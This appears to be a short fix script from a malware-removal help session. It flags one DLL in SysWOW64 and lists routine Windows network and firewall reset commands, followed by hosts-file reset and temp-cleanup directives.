2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ () C:\Windows\SysWOW64\mfllib.dll
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
CMD: netsh int ipv4 reset
CMD: netsh int ipv6 reset
Hosts:
EmptyTemp: